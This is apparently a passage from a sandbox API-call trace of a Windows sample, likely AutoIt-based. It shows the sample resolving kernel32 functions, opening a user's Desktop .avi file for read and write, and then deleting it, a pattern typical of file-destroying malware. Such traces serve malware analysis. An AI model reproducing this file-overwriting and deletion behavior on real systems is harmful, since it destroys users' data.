RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.346] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.346] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0031.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x889688, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0031.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\5em8.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0031.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.349] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.349] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.349] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.349] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.349] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cc70 [0031.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cc70, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0031.350] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.350] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.350] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.350] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.350] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.350] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.350] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.351] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0031.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.351] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.351] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.351] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.351] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", lpFilePart=0x0) returned 0x4f [0031.352] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5336bc70, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x7f98f740, ftLastAccessTime.dwHighDateTime=0x1d5c185, ftLastWriteTime.dwLowDateTime=0x1292ca60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x123c4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5EM8.avi", cAlternateFileName="")) returned 0x7c2240 [0031.352] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\5em8.avi")) returned 1 [0031.353] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5336bc70, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x7f98f740, ftLastAccessTime.dwHighDateTime=0x1d5c185, ftLastWriteTime.dwLowDateTime=0x1292ca60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x123c4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5EM8.avi", cAlternateFileName="")) returned 0 [0031.353] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0031.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.354] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.355] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.355] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.355] HeapFree 